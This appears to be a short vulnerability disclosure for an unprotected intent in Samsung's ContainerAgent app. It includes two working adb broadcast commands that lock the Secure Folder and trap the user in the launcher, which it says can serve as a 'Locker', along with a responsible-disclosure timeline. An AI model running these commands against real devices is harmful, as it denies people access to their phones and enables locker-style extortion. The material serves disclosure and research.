Due to an unprotected intent in the ContainerAgent app, a Samsung smartphone can become temporarily bricked. This vulnerability can be used to create a Locker.
A write up has been published on Medium: https://medium.com/@fs0c131y/how-to-brick-all-samsung-phones-6aae4389bea?source=friends_link&sk=d044380dfde02c588fdab07d67720f2b
Lock Secure folder
adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1001 --ei "android.intent.extra.user_handle" 150
Go back to launcher
adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1002 --ei "android.intent.extra.user_handle" 0
The user will be stuck in the launcher and his Secure Folder will be locked all the time.
- 04/02/19: Initial finding by @fs0c131y
- 11/03/19: Responsible disclosure to the Samsung Security Team
- 18/03/19: The Samsung Security Team considered this issue as no/little security impact
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The investigation and the POC has been made with ❤ by @fs0c131y